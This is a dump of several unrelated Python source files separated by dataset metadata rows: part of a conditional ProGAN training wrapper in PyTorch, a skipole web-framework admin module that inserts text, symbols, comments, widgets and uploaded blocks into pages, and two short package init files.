        self.gen_optim.zero_grad()
        loss.backward()
        self.gen_optim.step()

        # if use_ema is true, apply ema to the generator parameters
        if self.use_ema:
            self.__apply_ema_on_generator()

        # return the loss value
        return loss.item()
class ConditionalProGAN:
    """ Wrapper around the Generator and the (conditional) Discriminator.

    Same training harness as ProGAN, but the discriminator additionally
    receives a conditioning latent vector (e.g. a text embedding).
    """

    def __init__(self, embedding_size, depth=7, latent_size=512, compressed_latent_size=128,
                 learning_rate=0.001, beta_1=0, beta_2=0.99,
                 eps=1e-8, drift=0.001, n_critic=1, use_eql=True,
                 loss="wgan-gp", use_ema=True, ema_decay=0.999,
                 device=th.device("cuda")):
        """
        constructor for the class
        :param embedding_size: size of the encoded text embeddings
        :param depth: depth of the GAN (will be used for each generator and discriminator)
        :param latent_size: latent size of the manifold used by the GAN
        :param compressed_latent_size: size of the compressed latent vectors
        :param learning_rate: learning rate for Adam
        :param beta_1: beta_1 for Adam
        :param beta_2: beta_2 for Adam
        :param eps: epsilon for Adam
        :param n_critic: number of times to update discriminator
                         (Used only if loss is wgan or wgan-gp)
        :param drift: drift penalty coefficient
                      (Used only if loss is wgan or wgan-gp)
        :param use_eql: whether to use equalized learning rate
        :param loss: the loss function to be used
                     Can either be a string => ["wgan-gp", "wgan"]
                     Or an instance of ConditionalGANLoss
        :param use_ema: boolean for whether to use exponential moving averages
        :param ema_decay: value of mu for ema
        :param device: device to run the GAN on (GPU / CPU)
        """
        from torch.optim import Adam

        # Create the Generator and the Discriminator
        self.gen = Generator(depth, latent_size, use_eql=use_eql).to(device)
        self.dis = ConditionalDiscriminator(depth, embedding_size, compressed_latent_size,
                                            use_eql=use_eql).to(device)

        # state of the object
        self.latent_size = latent_size
        self.compressed_latent_size = compressed_latent_size
        self.depth = depth
        self.use_ema = use_ema
        self.ema_decay = ema_decay
        self.n_critic = n_critic
        self.use_eql = use_eql
        self.device = device
        self.drift = drift

        # define the optimizers for the discriminator and generator
        self.gen_optim = Adam(self.gen.parameters(), lr=learning_rate,
                              betas=(beta_1, beta_2), eps=eps)
        self.dis_optim = Adam(self.dis.parameters(), lr=learning_rate,
                              betas=(beta_1, beta_2), eps=eps)

        # define the loss function used for training the GAN
        self.loss = self.__setup_loss(loss)

        # setup the ema for the generator
        if self.use_ema:
            from networks.CustomLayers import EMA
            self.ema = EMA(self.ema_decay)
            self.__register_generator_to_ema()

    def __register_generator_to_ema(self):
        # register every trainable generator parameter with the EMA tracker
        for name, param in self.gen.named_parameters():
            if param.requires_grad:
                self.ema.register(name, param.data)

    def __apply_ema_on_generator(self):
        # overwrite generator weights with their smoothed (EMA) values
        for name, param in self.gen.named_parameters():
            if param.requires_grad:
                param.data = self.ema(name, param.data)

    def __setup_loss(self, loss):
        """Resolve *loss* (a string key or a ConditionalGANLoss instance)."""
        import networks.Losses as losses

        if isinstance(loss, str):
            loss = loss.lower()  # lowercase the string
            if loss == "wgan":
                loss = losses.CondWGAN_GP(self.device, self.dis, self.drift, use_gp=False)
                # note if you use just wgan, you will have to use weight clipping
                # in order to prevent gradient exploding
            elif loss == "wgan-gp":
                loss = losses.CondWGAN_GP(self.device, self.dis, self.drift, use_gp=True)
            else:
                raise ValueError("Unknown loss function requested")
        elif not isinstance(loss, losses.ConditionalGANLoss):
            # BUGFIX: the message previously said "GANLoss" although the check
            # is against ConditionalGANLoss
            raise ValueError("loss is neither an instance of ConditionalGANLoss nor a string")
        return loss

    def optimize_discriminator(self, noise, real_batch, latent_vector, depth, alpha,
                               use_matching_aware=True):
        """
        performs one step of weight update on discriminator using the batch of data
        :param noise: input noise of sample generation
        :param real_batch: real samples batch
        :param latent_vector: (conditional latent vector)
        :param depth: current depth of optimization
        :param alpha: current alpha for fade-in
        :param use_matching_aware: whether to use matching aware discrimination
        :return: current loss (Wasserstein loss)
        """
        from torch.nn import AvgPool2d
        # BUGFIX: torch.nn.functional.upsample is deprecated; interpolate is the
        # drop-in replacement (both default to nearest-neighbour mode).
        from torch.nn.functional import interpolate

        # downsample the real_batch for the given depth
        down_sample_factor = int(np.power(2, self.depth - depth - 1))
        prior_downsample_factor = max(int(np.power(2, self.depth - depth)), 0)
        ds_real_samples = AvgPool2d(down_sample_factor)(real_batch)
        if depth > 0:
            # one resolution lower, scaled back up for the fade-in blend
            prior_ds_real_samples = interpolate(AvgPool2d(prior_downsample_factor)(real_batch),
                                                scale_factor=2)
        else:
            prior_ds_real_samples = ds_real_samples

        # real samples are a combination of ds_real_samples and prior_ds_real_samples
        real_samples = (alpha * ds_real_samples) + ((1 - alpha) * prior_ds_real_samples)

        loss_val = 0
        for _ in range(self.n_critic):
            # generate a batch of samples (detached: no generator gradients here)
            fake_samples = self.gen(noise, depth, alpha).detach()
            loss = self.loss.dis_loss(real_samples, fake_samples,
                                      latent_vector, depth, alpha)

            if use_matching_aware:
                # matching-aware discrimination: pair real images with shuffled
                # (mismatched) conditioning vectors and penalise high scores
                mis_match_text = latent_vector[np.random.permutation(latent_vector.shape[0]), :]
                m_a_d = self.dis(real_samples, mis_match_text, depth, alpha)
                loss = loss + th.mean(m_a_d)

            # optimize discriminator
            self.dis_optim.zero_grad()
            loss.backward()
            self.dis_optim.step()

            loss_val += loss.item()

        return loss_val / self.n_critic

    def optimize_generator(self, noise, latent_vector, depth, alpha):
        """
        performs one step of weight update on generator for the given batch_size
        :param noise: input random noise required for generating samples
        :param latent_vector: (conditional latent vector)
        :param depth: depth of the network at which optimization is done
        :param alpha: value of alpha for fade-in effect
        :return: current loss (Wasserstein estimate)
        """
        # generate fake samples:
        fake_samples = self.gen(noise, depth, alpha)

        # TODO: Change this implementation for making it compatible for relativisticGAN
        loss = self.loss.gen_loss(None, fake_samples, latent_vector, depth, alpha)

        # optimize the generator
        self.gen_optim.zero_grad()
        # retain_graph kept as in the original training loop — presumably the
        # conditional loss reuses part of the graph; confirm before removing
        loss.backward(retain_graph=True)
        self.gen_optim.step()

        # if use_ema is true, apply ema to the generator parameters
        if self.use_ema:
            self.__apply_ema_on_generator()

        # return the loss value
        return loss.item()
| 39.55538
| 96
| 0.606984
| 3,124
| 24,999
| 4.698464
| 0.098592
| 0.02003
| 0.019417
| 0.009811
| 0.872326
| 0.854408
| 0.836354
| 0.836354
| 0.810533
| 0.80079
| 0
| 0.012585
| 0.313453
| 24,999
| 632
| 97
| 39.55538
| 0.842627
| 0.291092
| 0
| 0.719626
| 0
| 0
| 0.031954
| 0
| 0
| 0
| 0
| 0.003165
| 0.028037
| 1
| 0.056075
| false
| 0
| 0.074766
| 0
| 0.174455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac32e225a7b20e42f721559cc28621664c4e0fa7
| 23,198
|
py
|
Python
|
skipole/skiadmin/skiadminpackages/editwidgets/inserts.py
|
bernie-skipole/skipole
|
b45d3291c593e7c03c053ab4f192f1ecc5c3e9b9
|
[
"MIT"
] | null | null | null |
skipole/skiadmin/skiadminpackages/editwidgets/inserts.py
|
bernie-skipole/skipole
|
b45d3291c593e7c03c053ab4f192f1ecc5c3e9b9
|
[
"MIT"
] | null | null | null |
skipole/skiadmin/skiadminpackages/editwidgets/inserts.py
|
bernie-skipole/skipole
|
b45d3291c593e7c03c053ab4f192f1ecc5c3e9b9
|
[
"MIT"
] | null | null | null |
from ... import FailPage, ValidateError, GoTo, ServerError, skilift
from ....skilift import editpage, editsection
from ....ski.project_class_definition import SectionData
def show_empty_modal_insert(skicall):
    "Fills in empty modal insert"
    call_data = skicall.call_data
    pd = call_data['pagedata']

    sd = SectionData("widgetinserts")
    sd["insertitem", "hide"] = False

    location = call_data['location']
    widget_name = location[0]
    container = location[1]

    # an empty container must have no trailing location integers
    if location[2]:
        raise FailPage("Invalid location")

    insert_location = "%s-%s" % (widget_name, container)

    # every insert link carries the insert location in its get_field1
    for link_ident in ("insert_text", "insert_textblock", "insert_symbol",
                       "insert_comment", "insert_element", "insert_widget",
                       "insert_section"):
        sd[link_ident, "get_field1"] = insert_location

    # the upload form carries it in a hidden field instead
    sd["uploadpart", "hidden_field1"] = insert_location
    pd.update(sd)
def insert_in_widget(skicall):
    """Called by domtable to either insert or append an item in a widget container
       sets PageData object to populate the insert or append modal panel"""
    call_data = skicall.call_data
    pd = call_data['pagedata']
    sd = SectionData("widgetinserts")

    pagenumber = None
    section_name = None

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
    elif "section_name" in call_data:
        section_name = call_data["section_name"]
    else:
        raise FailPage(message = "No page or section given")

    if ('editdom', 'domtable', 'contents') not in call_data:
        raise FailPage(message = "item to edit missing")

    editedprojname = call_data['editedprojname']
    part = call_data['editdom', 'domtable', 'contents']

    # part is a '-' joined location string: widget name, container number,
    # then the location integers. Split it into a three-item location:
    #   (widget name, container integer, tuple of location integers)
    location_list = part.split('-')
    # first item should be a string, rest integers
    if len(location_list) < 3:
        raise FailPage("Item to append to has not been recognised")
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        location_integers = tuple( int(i) for i in location_list[2:] )
    except ValueError:
        # BUGFIX: narrowed from a bare except — only a non-integer field
        # should map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    insert_location = widget_name + '-' + str(container) + '-' + '-'.join(str(i) for i in location_integers)

    # display the modal panel
    sd["insertitem","hide"] = False

    if (part_tuple.part_type == "Part") or (part_tuple.part_type == "Section"):
        # insert
        sd["insertpara","para_text"] = "Choose an item to insert"
        sd["insertupload","para_text"] = "Or insert a new block by uploading a block definition file:"
    else:
        # append
        sd["insertpara","para_text"] = "Choose an item to append"
        sd["insertupload","para_text"] = "Or append a new block by uploading a block definition file:"

    # for each of the links, set get_field1 to be the insert_location
    sd["insert_text","get_field1"] = insert_location
    sd["insert_textblock","get_field1"] = insert_location
    sd["insert_symbol","get_field1"] = insert_location
    sd["insert_comment","get_field1"] = insert_location
    sd["insert_element","get_field1"] = insert_location
    sd["insert_widget","get_field1"] = insert_location
    if pagenumber:
        # sections cannot be nested, so the section link only shows on pages
        sd["insert_section","get_field1"] = insert_location
    # set the hidden field
    sd["uploadpart","hidden_field1"] = insert_location
    pd.update(sd)
def insert_text(skicall):
    "Inserts text into a page"
    call_data = skicall.call_data
    pd = call_data['pagedata']
    sd = SectionData("adminhead")

    pagenumber = None
    section_name = None

    editedprojname = call_data['editedprojname']

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
        page_info = skilift.item_info(editedprojname, pagenumber)
        if page_info is None:
            raise FailPage("Page to edit not identified")
        # only template and SVG pages can take inserted items
        if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
            raise FailPage("Page not identified")
    elif "section_name" in call_data:
        section_name = call_data["section_name"]
    else:
        raise FailPage(message = "No page or section given")

    if ("widgetinserts","insert_text","get_field1") not in call_data:
        raise FailPage(message = "item to edit missing")

    part = call_data["widgetinserts","insert_text","get_field1"]

    # part is a '-' joined string: widget name, container number, location integers
    location_list = part.split('-')
    # first item should be a string, rest integers
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        if len(location_list) < 3:
            location_integers = ()
        else:
            location_integers = tuple( int(i) for i in location_list[2:] )
    except (ValueError, IndexError):
        # BUGFIX: narrowed from a bare except — only a malformed field should
        # map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    new_text = 'Set text here'

    if pagenumber:
        call_data['pchange'], new_location = skilift.insert_item_in_page(editedprojname, pagenumber, call_data['pchange'], location, new_text)
        sd["page_head","large_text"] = "Edit Text in Page: %s Widget: %s" % (pagenumber,widget_name)
    else:
        call_data['schange'], new_location = skilift.insert_item_in_section(editedprojname, section_name, call_data['schange'], location, new_text)
        sd["page_head","large_text"] = "Edit Text in Section : %s Widget %s" % (section_name,widget_name)
    pd.update(sd)
    call_data['location'] = new_location
    # go to edit text page, set the text in the text area
    pd["text_input","input_text"] = new_text
def insert_textblock(skicall):
    "Fills the template page for creating a textblock reference which will be inserted in the edited page"
    call_data = skicall.call_data
    pd = call_data['pagedata']
    sd = SectionData("adminhead")

    pagenumber = None
    section_name = None

    editedprojname = call_data['editedprojname']

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
        page_info = skilift.item_info(editedprojname, pagenumber)
        if page_info is None:
            raise FailPage("Page to edit not identified")
        # only template and SVG pages can take inserted items
        if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
            raise FailPage("Page not identified")
    elif "section_name" in call_data:
        section_name = call_data["section_name"]
    else:
        raise FailPage(message = "No page or section given")

    if ("widgetinserts","insert_textblock","get_field1") not in call_data:
        raise FailPage(message = "item to edit missing")

    part = call_data["widgetinserts","insert_textblock","get_field1"]

    # part is a '-' joined string: widget name, container number, location integers
    location_list = part.split('-')
    # first item should be a string, rest integers
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        if len(location_list) < 3:
            location_integers = ()
        else:
            location_integers = tuple( int(i) for i in location_list[2:] )
    except (ValueError, IndexError):
        # BUGFIX: narrowed from a bare except — only a malformed field should
        # map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    call_data['location'] = location

    # and set page data for the template page which inserts a textblock reference
    if pagenumber:
        sd["page_head","large_text"] = "Insert TextBlock in Page: %s Widget: %s" % (pagenumber, widget_name)
    else:
        sd["page_head","large_text"] = "Insert TextBlock in Section: %s Widget: %s" % (section_name, widget_name)
    pd.update(sd)

    # default both the linebreaks and escape radio controls to ON
    pd["linebreaks","radio_values"]=['ON', 'OFF']
    pd["linebreaks","radio_text"]=['On', 'Off']
    pd["linebreaks","radio_checked"] = 'ON'

    pd["setescape","radio_values"]=['ON', 'OFF']
    pd["setescape","radio_text"]=['On', 'Off']
    pd["setescape","radio_checked"] = 'ON'
def insert_symbol(skicall):
    "Inserts html symbol into a page"
    call_data = skicall.call_data
    pd = call_data['pagedata']
    sd = SectionData("adminhead")

    pagenumber = None
    section_name = None

    editedprojname = call_data['editedprojname']

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
        page_info = skilift.item_info(editedprojname, pagenumber)
        if page_info is None:
            raise FailPage("Page to edit not identified")
        # only template and SVG pages can take inserted items
        if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
            raise FailPage("Page not identified")
    elif "section_name" in call_data:
        section_name = call_data["section_name"]
    else:
        raise FailPage(message = "No page or section given")

    if ("widgetinserts","insert_symbol","get_field1") not in call_data:
        raise FailPage(message = "item to edit missing")

    part = call_data["widgetinserts","insert_symbol","get_field1"]

    # part is a '-' joined string: widget name, container number, location integers
    location_list = part.split('-')
    # first item should be a string, rest integers
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        if len(location_list) < 3:
            location_integers = ()
        else:
            location_integers = tuple( int(i) for i in location_list[2:] )
    except (ValueError, IndexError):
        # BUGFIX: narrowed from a bare except — only a malformed field should
        # map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    # create the symbol, then pass control to the edit symbol page
    if pagenumber:
        call_data['pchange'], new_location = editpage.create_html_symbol_in_page(editedprojname, pagenumber, call_data['pchange'], location)
        sym = editpage.get_symbol(editedprojname, pagenumber, call_data['pchange'], new_location)
        sd["page_head","large_text"] = "Edit Symbol in Page: %s Widget: %s" % (pagenumber, widget_name)
    else:
        call_data['schange'], new_location = editsection.create_html_symbol_in_section(editedprojname, section_name, call_data['schange'], location)
        sym = editsection.get_symbol(editedprojname, section_name, call_data['schange'], new_location)
        sd["page_head","large_text"] = "Edit Symbol in Section: %s Widget: %s" % (section_name, widget_name)
    pd.update(sd)
    call_data['location'] = new_location
    pd["symbol_input","input_text"] = sym
def insert_comment(skicall):
    "Inserts a comment into a page"
    call_data = skicall.call_data
    pd = call_data['pagedata']
    sd = SectionData("adminhead")

    pagenumber = None
    section_name = None

    editedprojname = call_data['editedprojname']

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
        page_info = skilift.item_info(editedprojname, pagenumber)
        if page_info is None:
            raise FailPage("Page to edit not identified")
        # only template and SVG pages can take inserted items
        if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
            raise FailPage("Page not identified")
    elif "section_name" in call_data:
        section_name = call_data["section_name"]
    else:
        raise FailPage(message = "No page or section given")

    if ("widgetinserts","insert_comment","get_field1") not in call_data:
        raise FailPage(message = "item to edit missing")

    part = call_data["widgetinserts","insert_comment","get_field1"]

    # part is a '-' joined string: widget name, container number, location integers
    location_list = part.split('-')
    # first item should be a string, rest integers
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        if len(location_list) < 3:
            location_integers = ()
        else:
            location_integers = tuple( int(i) for i in location_list[2:] )
    except (ValueError, IndexError):
        # BUGFIX: narrowed from a bare except — only a malformed field should
        # map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    # create the comment, then pass control to the edit comment page
    # (previous comment wrongly said "edit symbol page")
    if pagenumber:
        call_data['pchange'], new_location = editpage.create_html_comment_in_page(editedprojname, pagenumber, call_data['pchange'], location)
        com = editpage.get_comment(editedprojname, pagenumber, call_data['pchange'], new_location)
        sd["page_head","large_text"] = "Edit Comment in Page: %s Widget: %s" % (pagenumber, widget_name)
    else:
        call_data['schange'], new_location = editsection.create_html_comment_in_section(editedprojname, section_name, call_data['schange'], location)
        com = editsection.get_comment(editedprojname, section_name, call_data['schange'], new_location)
        sd["page_head","large_text"] = "Edit Comment in Section: %s Widget: %s" % (section_name, widget_name)
    pd.update(sd)
    call_data['location'] = new_location
    pd["comment_input","input_text"] = com
def insert_element(skicall):
    "Fills the template page for creating an html element which will be inserted in the edited page"
    call_data = skicall.call_data
    pd = call_data['pagedata']
    sd = SectionData("adminhead")

    pagenumber = None
    section_name = None

    editedprojname = call_data['editedprojname']

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
        page_info = skilift.item_info(editedprojname, pagenumber)
        if page_info is None:
            raise FailPage("Page to edit not identified")
        # only template and SVG pages can take inserted items
        if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
            raise FailPage("Page not identified")
    elif "section_name" in call_data:
        section_name = call_data["section_name"]
    else:
        raise FailPage(message = "No page or section given")

    if ("widgetinserts","insert_element","get_field1") not in call_data:
        raise FailPage(message = "item to edit missing")

    part = call_data["widgetinserts","insert_element","get_field1"]

    # part is a '-' joined string: widget name, container number, location integers
    location_list = part.split('-')
    # first item should be a string, rest integers
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        if len(location_list) < 3:
            location_integers = ()
        else:
            location_integers = tuple( int(i) for i in location_list[2:] )
    except (ValueError, IndexError):
        # BUGFIX: narrowed from a bare except — only a malformed field should
        # map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    call_data['location'] = location

    # and set page data for the template page which inserts an HTML element
    if pagenumber:
        sd["page_head","large_text"] = "Insert an HTML element into Page: %s Widget: %s" % (pagenumber, widget_name)
    else:
        sd["page_head","large_text"] = "Insert an HTML element into Section: %s Widget: %s" % (section_name, widget_name)
    pd.update(sd)
def insert_widget(skicall):
    "Gets page number and location, used for creating a widget which will be inserted in the page"
    call_data = skicall.call_data

    pagenumber = None
    section_name = None

    editedprojname = call_data['editedprojname']

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
        page_info = skilift.item_info(editedprojname, pagenumber)
        if page_info is None:
            raise FailPage("Page to edit not identified")
        # only template and SVG pages can take inserted items
        if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
            raise FailPage("Page not identified")
    elif "section_name" in call_data:
        section_name = call_data["section_name"]
    else:
        raise FailPage(message = "No page or section given")

    if ("widgetinserts","insert_widget","get_field1") not in call_data:
        raise FailPage(message = "item to edit missing")

    part = call_data["widgetinserts","insert_widget","get_field1"]

    # part is a '-' joined string: widget name, container number, location integers
    location_list = part.split('-')
    # first item should be a string, rest integers
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        if len(location_list) < 3:
            location_integers = ()
        else:
            location_integers = tuple( int(i) for i in location_list[2:] )
    except (ValueError, IndexError):
        # BUGFIX: narrowed from a bare except — only a malformed field should
        # map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    call_data['location'] = location

    # at this point, the call is passed to 54507 which is a responder which lists widget modules
    # and displays them on a template
def insert_section(skicall):
    "Gets page number and location, used for creating a section reference which will be inserted in the page"
    call_data = skicall.call_data
    pd = call_data['pagedata']
    sd = SectionData("adminhead")

    # section references can only be inserted into pages, never into sections
    pagenumber = None
    editedprojname = call_data['editedprojname']

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
    else:
        raise FailPage(message = "No page given")

    if ("widgetinserts","insert_section","get_field1") not in call_data:
        raise FailPage(message = "item to edit missing")

    page_info = skilift.item_info(editedprojname, pagenumber)
    if page_info is None:
        raise FailPage("Page to edit not identified")
    # only template and SVG pages can take inserted items
    if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
        raise FailPage("Page not identified")

    part = call_data["widgetinserts","insert_section","get_field1"]

    # part is a '-' joined string: widget name, container number, location integers
    location_list = part.split('-')
    # first item should be a string, rest integers
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        if len(location_list) < 3:
            location_integers = ()
        else:
            location_integers = tuple( int(i) for i in location_list[2:] )
    except (ValueError, IndexError):
        # BUGFIX: narrowed from a bare except — only a malformed field should
        # map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, None, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    call_data['location'] = location

    # Fill in header
    sd["page_head","large_text"] = "Insert Section place holder"
    pd.update(sd)

    # get current sections; if none exist, show an explanation instead of the form
    section_list = editsection.list_section_names(editedprojname)
    if not section_list:
        pd["nosection", "show"] = True
        pd["descript", "show"] = False
        pd["placename","show"] = False
        return

    pd['sectionname','option_list'] = section_list[:]
    pd['sectionname','selectvalue'] = section_list[0]
def insert_upload(skicall):
    "Gets page number and location, then creates a new block from an uploaded block definition file"
    call_data = skicall.call_data

    pagenumber = None
    section_name = None

    editedprojname = call_data['editedprojname']

    if "page_number" in call_data:
        pagenumber = call_data["page_number"]
        page_info = skilift.item_info(editedprojname, pagenumber)
        if page_info is None:
            raise FailPage("Page to edit not identified")
        # only template and SVG pages can take inserted items
        if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
            raise FailPage("Page not identified")
    elif "section_name" in call_data:
        section_name = call_data["section_name"]
    else:
        raise FailPage(message = "No page or section given")

    if ("widgetinserts","uploadpart","hidden_field1") not in call_data:
        raise FailPage(message = "item to edit missing")

    part = call_data["widgetinserts","uploadpart","hidden_field1"]

    # part is a '-' joined string: widget name, container number, location integers
    location_list = part.split('-')
    # first item should be a string, rest integers
    try:
        widget_name = location_list[0]
        container = int(location_list[1])
        if len(location_list) < 3:
            location_integers = ()
        else:
            location_integers = tuple( int(i) for i in location_list[2:] )
    except (ValueError, IndexError):
        # BUGFIX: narrowed from a bare except — only a malformed field should
        # map to this failure page, not arbitrary programming errors
        raise FailPage("Item to append to has not been recognised")

    location = (widget_name, container, location_integers)

    # get part_tuple from project, pagenumber, section_name, location
    part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
    if part_tuple is None:
        raise FailPage("Item to append to has not been recognised")

    # get file contents (uploaded bytes) and decode to a JSON string
    file_contents = call_data["widgetinserts","uploadpart", "action"]
    json_string = file_contents.decode(encoding='utf-8')

    try:
        if pagenumber:
            call_data['pchange'] = editpage.create_part_in_page(editedprojname, pagenumber, call_data['pchange'], location, json_string)
        else:
            call_data['schange'] = editsection.create_part_in_section(editedprojname, section_name, call_data['schange'], location, json_string)
    except ServerError as e:
        if e.message:
            raise FailPage(e.message)
        else:
            raise FailPage("An error has occurred in creating the item")

    call_data['widget_name'] = widget_name
    call_data['container'] = container
    call_data['status'] = 'New block created'
| 40.134948
| 149
| 0.678205
| 2,984
| 23,198
| 5.072051
| 0.068365
| 0.063958
| 0.017179
| 0.023852
| 0.852725
| 0.826032
| 0.815395
| 0.806673
| 0.781896
| 0.761943
| 0
| 0.004421
| 0.21989
| 23,198
| 577
| 150
| 40.204506
| 0.831906
| 0.117338
| 0
| 0.762791
| 0
| 0
| 0.260979
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.006977
| 0
| 0.032558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac69c7aa8ebd71ef086ea2e0cacf4c3fa1cd1086
| 114
|
py
|
Python
|
sumo_docker_pipeline/operation_module/__init__.py
|
Kensuke-Mitsuzawa/sumo_docker_pipeline
|
b16c7e0da4938bf813f2af2ed667887b4f9a6298
|
[
"MIT"
] | null | null | null |
sumo_docker_pipeline/operation_module/__init__.py
|
Kensuke-Mitsuzawa/sumo_docker_pipeline
|
b16c7e0da4938bf813f2af2ed667887b4f9a6298
|
[
"MIT"
] | 14
|
2021-05-23T14:16:21.000Z
|
2021-12-05T21:59:56.000Z
|
sumo_docker_pipeline/operation_module/__init__.py
|
Kensuke-Mitsuzawa/sumo_docker_pipeline
|
b16c7e0da4938bf813f2af2ed667887b4f9a6298
|
[
"MIT"
] | 1
|
2021-12-31T15:10:20.000Z
|
2021-12-31T15:10:20.000Z
|
from .docker_operation_module import SumoDockerController
from .local_operation_module import LocalSumoController
| 38
| 57
| 0.912281
| 12
| 114
| 8.333333
| 0.666667
| 0.3
| 0.42
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 114
| 2
| 58
| 57
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac835e1013519f195f4915f2072e63eff2a69922
| 130
|
py
|
Python
|
molsysmt/element/group/terminal_capping/__init__.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/element/group/terminal_capping/__init__.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/element/group/terminal_capping/__init__.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
from .names import n_terminal_capping_names, c_terminal_capping_names, names
from .is_terminal_capping import is_terminal_capping
| 43.333333
| 76
| 0.892308
| 20
| 130
| 5.3
| 0.4
| 0.566038
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 130
| 2
| 77
| 65
| 0.883333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3bb19dd4e1d237af6ee822505fe85d14bbdc5314
| 163
|
py
|
Python
|
debarcer/src/edit_distance.py
|
bgfritz1/debarcer_tobias
|
5c99abcee72f4605610473da0a56632d4fe824d3
|
[
"MIT"
